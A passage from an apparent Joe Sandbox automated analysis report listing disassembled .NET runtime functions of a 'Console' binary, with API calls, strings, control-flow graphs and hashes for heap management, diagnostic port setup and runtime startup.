                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHeapWrite_swprintfstrlen$CriticalSection$AllocateDeleteProcess$FreeInitializeSleepSwitchThreadVirtual
                                                                                                                                                                                                                          • String ID: VirtualCallStubManagerManager::AddStubManager - 0x%p (vptr 0x%p)
                                                                                                                                                                                                                          • API String ID: 691010103-2064279654
                                                                                                                                                                                                                          • Opcode ID: ee4a7d22d99bda4a1c3dcb77396ccf3dcc3c94afc278e7ed1c518492d7c02707
                                                                                                                                                                                                                          • Instruction ID: 1896a3958db51f4ff62a376e461a00c8e3347381d5ee9713b02a292136316923
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee4a7d22d99bda4a1c3dcb77396ccf3dcc3c94afc278e7ed1c518492d7c02707
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00627CB0A00246DFEF15CFA8C8947AEBBF0BF58300F1441ADE949AB381DB759944DB91
                                                                                                                                                                                                                          Function 01114630 Relevance: 3.2, APIs: 2, Instructions: 736memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,?,00000004,00000001,00000000,?,?,00000000,00000000,00000000), ref: 01114C7B
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00000004,00000001,00000000,?,?,00000000,00000000,00000000), ref: 01114FEE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 32dae99124a6a04f37c36a0cfaf5687cd6577d7923136cd646f875c8d07965cd
                                                                                                                                                                                                                          • Instruction ID: 150648a1c814cdd82cda390517211be768f518ae880948c00cf88b0f46aff1ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32dae99124a6a04f37c36a0cfaf5687cd6577d7923136cd646f875c8d07965cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D52B570A00229CFEB29CF28C851BAEFBF2BF45704F1541A9D549AB685DB349D81CF91
                                                                                                                                                                                                                          Function 012D2160 Relevance: 2.6, APIs: 2, Instructions: 113memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 012D2176
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000030,00000000,00000000,00000000,00000000,?), ref: 012D2193
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Process$AllocAllocate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1154092256-0
                                                                                                                                                                                                                          • Opcode ID: 143285d17efbabde225fd2878a4d19b2d10e95cc4b30b193be57065ce48c99e9
                                                                                                                                                                                                                          • Instruction ID: dac26035f781290f2988e29c63d3ab222e6958fa3e8b63e58d3ba8071274f257
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 143285d17efbabde225fd2878a4d19b2d10e95cc4b30b193be57065ce48c99e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26419C75600705AFD721DFA9E840B5ABBE4EF68611F00452EEA89D7351E731E914CB90
                                                                                                                                                                                                                          Function 00FE97C0 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Failed to add static field to instantiated type instance, xrefs: 00FEA087
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Failed to add static field to instantiated type instance
                                                                                                                                                                                                                          • API String ID: 0-225272292
                                                                                                                                                                                                                          • Opcode ID: 07d5c6ea3caf50be56ab9b77f563605afdc51fcc9d58f8745ce6867b6957cc29
                                                                                                                                                                                                                          • Instruction ID: a2e049129e7215a54e011a79a49477602532852b315a0227bba1a8fbe1732901
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07d5c6ea3caf50be56ab9b77f563605afdc51fcc9d58f8745ce6867b6957cc29
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF17E716083859FCB04DF29C890A6EB7E5FF88314F14892DFD958B290DB74E905DBA2
                                                                                                                                                                                                                          Function 0109EDB0 Relevance: .7, Instructions: 657COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d2e9493b2dfb185429912322e89605e0129873b489216f65cad8520e770f1d58
                                                                                                                                                                                                                          • Instruction ID: 020065074ab9229dde2ae3617352759ad4f1b3336b8ecf18d760d2f79b2c0645
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2e9493b2dfb185429912322e89605e0129873b489216f65cad8520e770f1d58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB32E671E001168FEF29CF68C8657FEBFF2AB85300F15815AE696EB281D7359901EB50
                                                                                                                                                                                                                          Function 012D8A40 Relevance: 44.1, APIs: 15, Strings: 10, Instructions: 375memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 537 12d8a40-12d8aba call 121af80 540 12d8abc-12d8ac4 537->540 541 12d8ac6-12d8ae2 WideCharToMultiByte 537->541 542 12d8b3f-12d8b48 540->542 543 12d8aec-12d8afe malloc 541->543 544 12d8ae4-12d8aea 541->544 547 12d8b4a-12d8b4c 542->547 548 12d8b67-12d8b69 542->548 545 12d8b0a-12d8b24 WideCharToMultiByte 543->545 546 12d8b00-12d8b08 543->546 544->542 549 12d8b3a 545->549 550 12d8b26-12d8b38 free 545->550 546->542 551 12d8b5d 547->551 552 12d8b4e-12d8b57 HeapFree 547->552 553 12d8b6f-12d8b7d 548->553 554 12d8f18-12d8f78 call 121ae20 call 12d8880 call 14ab38a 548->554 549->542 550->542 551->548 552->551 556 12d8b9d-12d8bef call 12dc480 * 2 553->556 557 12d8b7f-12d8b93 553->557 566 12d8e69-12d8e73 556->566 567 12d8bf5-12d8bf7 556->567 557->556 569 12d8e9a-12d8ea0 566->569 570 12d8e75-12d8e7d 566->570 567->566 571 12d8bfd-12d8c19 call 12d8800 567->571 575 12d8eb4-12d8eba free 569->575 576 12d8ea2-12d8eb2 569->576 572 12d8e7f-12d8e8f 570->572 573 12d8e91-12d8e97 free 570->573 571->570 582 12d8c1f 571->582 572->569 573->569 577 12d8ebd-12d8ebf 575->577 576->577 579 12d8ee6-12d8eec 577->579 580 12d8ec1-12d8ec9 577->580 587 12d8eee-12d8efe 579->587 588 12d8f00-12d8f06 free 579->588 584 12d8edd-12d8ee3 free 580->584 585 12d8ecb-12d8edb 580->585 586 12d8c20-12d8c37 call 122a500 582->586 584->579 585->579 596 12d8c39-12d8c52 call 122a520 586->596 597 12d8c55-12d8c57 586->597 590 12d8f09-12d8f15 free 587->590 588->590 590->554 596->597 598 12d8c5d-12d8c61 597->598 599 12d8dfa-12d8e09 597->599 603 12d8c8a-12d8c9c call 12d8800 598->603 604 12d8c63-12d8c68 598->604 599->586 605 12d8e0f 599->605 613 12d8e60-12d8e67 603->613 614 12d8ca2-12d8cc6 603->614 607 12d8c6a-12d8c6e 604->607 608 12d8c83 604->608 605->570 607->608 610 12d8c70-12d8c80 call 14af100 607->610 608->603 610->608 615 12d8df4 613->615 617 12d8cd0-12d8cdf 614->617 615->599 618 12d8cee-12d8cff _stricmp 617->618 619 12d8ce1-12d8ce9 617->619 621 12d8d0c-12d8d1d _stricmp 618->621 622 12d8d01-12d8d07 618->622 620 12d8d91-12d8da1 619->620 620->617 625 12d8da7-12d8da9 620->625 623 12d8d1f-12d8d29 621->623 624 12d8d2b-12d8d3c _stricmp 621->624 622->620 623->620 626 12d8d3e-12d8d44 624->626 627 12d8d46-12d8d57 _stricmp 624->627 628 12d8dab-12d8daf 625->628 629 12d8dca-12d8ddb call 122a500 625->629 626->620 631 12d8d59-12d8d63 627->631 632 12d8d65-12d8d6f 627->632 628->629 633 12d8db1-12d8dc0 isspace 628->633 638 12d8ddd-12d8deb call 122a520 629->638 639 12d8dee 629->639 631->620 632->620 635 12d8d71-12d8d78 632->635 636 12d8e11-12d8e31 call 12d8880 call 122a500 633->636 637 12d8dc2-12d8dc8 633->637 635->620 640 12d8d7a-12d8d8e call 122a520 635->640 649 12d8e58-12d8e5e 636->649 650 12d8e33-12d8e55 call 122a520 636->650 637->629 637->633 638->639 639->615 640->620 649->639 650->649
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 012D8AD8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012D8B57
                                                                                                                                                                                                                            • Part of subcall function 012D8800: strtok_s.API-MS-WIN-CRT-STRING-L1-1-0(?,015B451C,00000000,00000000,?,00000000,012D8C0E), ref: 012D8818
                                                                                                                                                                                                                            • Part of subcall function 012D8800: strtok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,015B451C,?), ref: 012D8864
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,listen,00000000,00000000), ref: 012D8CF4
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 012D8DB5
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 012D8E91
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D8EB4
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 012D8EDD
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D8F00
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 012D8F0F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • suspend, xrefs: 012D8D46
                                                                                                                                                                                                                          • ds_port_builder_set_tag - Unknown tag '%s'., xrefs: 012D8D7B
                                                                                                                                                                                                                          • failed, xrefs: 012D8E35
                                                                                                                                                                                                                          • nosuspend, xrefs: 012D8D2B
                                                                                                                                                                                                                          • listen, xrefs: 012D8CEE
                                                                                                                                                                                                                          • succeeded, xrefs: 012D8E3A, 012D8E42
                                                                                                                                                                                                                          • connect, xrefs: 012D8D0C
                                                                                                                                                                                                                          • ds_ipc_stream_factory_configure - Ignoring port configuration with empty address, xrefs: 012D8DDD
                                                                                                                                                                                                                          • ds_ipc_stream_factory_configure - Attempted to create Diagnostic Port from "%s"., xrefs: 012D8C44
                                                                                                                                                                                                                          • ds_ipc_stream_factory_configure - Diagnostic Port creation %s, xrefs: 012D8E43
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$FreeHeapstrtok_s$ByteCharMultiWide_stricmpisspace
                                                                                                                                                                                                                          • String ID: connect$ds_ipc_stream_factory_configure - Attempted to create Diagnostic Port from "%s".$ds_ipc_stream_factory_configure - Diagnostic Port creation %s$ds_ipc_stream_factory_configure - Ignoring port configuration with empty address$ds_port_builder_set_tag - Unknown tag '%s'.$failed$listen$nosuspend$succeeded$suspend
                                                                                                                                                                                                                          • API String ID: 1069159200-1518389490
                                                                                                                                                                                                                          • Opcode ID: dfc983677c0406376adbe69445f2ca3628ac7c5ca59457a818bd66f9c119295e
                                                                                                                                                                                                                          • Instruction ID: c118e9d0e39026e4a7b3465a200c098cadf0ad876de6ee0de8ba5af152468631
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfc983677c0406376adbe69445f2ca3628ac7c5ca59457a818bd66f9c119295e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E12DB0A113159FEF209F18DC45BAA7BB5EF94304F0441ACEA09AB385DBB29960CF51
                                                                                                                                                                                                                          Function 01418480 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 284libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 653 1418480-14184d2 654 14184d4-14184da 653->654 655 14184dc-14184e5 653->655 656 14184e8-1418580 GetSystemInfo SetConsoleCtrlHandler GetModuleHandleW GetProcAddress GetModuleHandleW GetProcAddress call 12235a0 call 10d2db0 654->656 655->656 661 1418cb0-1418cd1 call 10aed60 656->661 662 1418586-141859f call 1011500 call 12281b0 call 14183c0 call 122e1f0 656->662 668 1418cd3-1418cd9 661->668 669 1418cf2-1418cf9 661->669 662->661 684 14185a5-14186b7 InitializeCriticalSection * 4 call fda4e0 call 108c050 call 1097da0 call 1084dc0 call 122a500 662->684 670 1418ce0-1418ced 668->670 671 1418cdb 668->671 672 1418dc8 669->672 673 1418cff-1418d18 call 121ae20 669->673 670->669 671->670 676 1418dcd-1418dd0 672->676 673->676 679 1418dd2 DebugBreak 676->679 680 1418dd8-1418de9 676->680 679->680 695 14186c9-14186e8 call 12ce600 call 121af40 684->695 696 14186b9-14186c6 call 122a520 684->696 703 141879e-1418804 call 12d75e0 call 14181c0 call 1167520 call 141a2e0 call 1418400 call 101f110 InitializeCriticalSection call 10633a0 call 122a500 695->703 704 14186ee-141875d call 121af40 * 4 call 121af80 695->704 696->695 737 1418816-141882b call 122a500 703->737 738 1418806-1418813 call 122a520 703->738 725 1418766-141879b call 1229bc0 call fe6500 704->725 726 141875f 704->726 725->703 726->725 743 1418843-1418850 call 10d95f0 737->743 744 141882d-1418840 call 122a520 737->744 738->737 749 1418852 call 10d2f70 743->749 750 14188af-14188bd call 1168c30 743->750 744->743 753 1418857-141886a call 122a500 749->753 756 14188da 750->756 757 14188bf-14188d8 call 121ae20 750->757 762 1418890-1418892 753->762 763 141886c-141886e 753->763 760 14188df-14188e2 756->760 757->760 764 14188e4 DebugBreak 760->764 765 14188ea-14188f7 760->765 762->750 769 1418894-14188ac call 122a520 762->769 763->661 766 1418874-141888b call 122a520 763->766 764->765 767 1418905-1418997 call 141a280 InitializeCriticalSection call 1060ef0 call ff6e10 InitializeCriticalSection call 11c0340 call 1419960 765->767 768 14188f9-14188ff SleepEx 765->768 766->661 786 14189a5-14189ba call 1215ca0 767->786 787 1418999-14189a0 767->787 768->767 769->750 790 14189d7 786->790 791 14189bc-14189d5 786->791 787->661 792 14189d9-1418a69 call 1159cd0 call 109a7e0 InitializeCriticalSection call fc2cd0 call 1006570 call 10b2d10 call 14167a0 InitializeCriticalSection call 1183040 790->792 791->792 807 1418a77-1418a89 call 1419a70 call 11362f0 792->807 808 1418a6b-1418a72 792->808 807->661 813 1418a8f-1418aa3 RtlAddVectoredExceptionHandler 807->813 808->661 814 1418aa9-1418ad3 call 107cb00 SetUnhandledExceptionFilter call 10844f0 813->814 815 1418dea-1418e1f call 1017580 call fcda50 call 14b061b call 122a500 813->815 824 1418af0-1418b58 call 106cf40 call 10f64d0 InitializeCriticalSection call 11b7e10 call 1102380 call 10811f0 814->824 825 1418ad5-1418aec 814->825 834 1418e21-1418e34 call 122a520 815->834 835 1418e37-1418e48 call fcd630 815->835 865 1418b68-1418b6d 824->865 866 1418b5a-1418b65 call 145c570 824->866 825->824 834->835 844 1418e4a-1418e51 call fcff80 835->844 845 1418e7d-1418f0c call 14b061b InitializeCriticalSection call 1418480 835->845 844->845 854 1418e53-1418e61 call fcff80 call fccba0 844->854 858 1418f11-1418fa1 845->858 854->845 864 1418e63-1418e76 call fcff80 854->864 864->845 874 1418e78 call 115dfb0 864->874 865->661 869 1418b73-1418b9d call 12ce780 call 10e0070 call 10daa70 865->869 866->865 880 1418bb4-1418c46 InitializeCriticalSection call fc3220 call fc4640 call fc5d40 call fc6ab0 call 121ae20 869->880 881 1418b9f-1418bb0 869->881 874->845 893 1418c50 880->893 894 1418c48-1418c4e 880->894 881->880 895 1418c55-1418c97 VirtualAlloc call 122a500 893->895 894->895 897 1418c9c-1418c9e 895->897 897->661 898 1418ca0-1418cad call 122a520 897->898 898->661
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(0163F09C,7CAB6A82,00000000,?,00000000), ref: 0141850C
                                                                                                                                                                                                                          • SetConsoleCtrlHandler.KERNEL32(01418330,00000001,?,00000000), ref: 0141852D
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 01418538
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitializeContext2), ref: 01418544
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,00000000), ref: 01418554
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RtlRestoreContext), ref: 01418566
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EE00,?,00000000), ref: 014185B4
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EE24,?,00000000), ref: 014185E5
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EAD0,?,00000000), ref: 01418616
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EFC8,?,00000000), ref: 01418649
                                                                                                                                                                                                                            • Part of subcall function 012CE600: GetActiveProcessorGroupCount.KERNEL32 ref: 012CE639
                                                                                                                                                                                                                            • Part of subcall function 012CE600: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,?,000000A1,?,?,?,014186CE,00FC0000,?,?,00000000), ref: 012CE670
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EE94,?,00000000,?,00FC0000,00000000,00FC0000,?,?,00000000), ref: 014187D2
                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,00000000), ref: 01418DD2
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,00000000,?,00FC0000,00000000,00FC0000,?,?,00000000), ref: 014188E4
                                                                                                                                                                                                                          • SleepEx.KERNEL32(00000000,00000000,?,00000000,?,00FC0000,00000000,00FC0000,?,?,00000000), ref: 014188FF
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EEE4,?,00000000,?,00FC0000,00000000,00FC0000,?,?,00000000), ref: 01418919
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EA90,?,00000000,?,00FC0000,00000000,00FC0000,?,?,00000000), ref: 01418956
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalInitializeSection$AddressBreakDebugHandleModuleProc$ActiveConsoleCountCtrlFreeGroupHandlerHeapInfoProcessorSleepSystemmalloc
                                                                                                                                                                                                                          • String ID: %s completed$%s failed with code %x$===================EEStartup Starting===================$EnsureRtlFunctions()$InitializeContext2$Returned successfully from InitThreadManager$RtlRestoreContext$g_pConfig->sync()$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 3857905088-983475224
                                                                                                                                                                                                                          • Opcode ID: 44c9221177ad3e36eeb1361b3383fb672fcad465ed9e419126cd26297ef03a0e
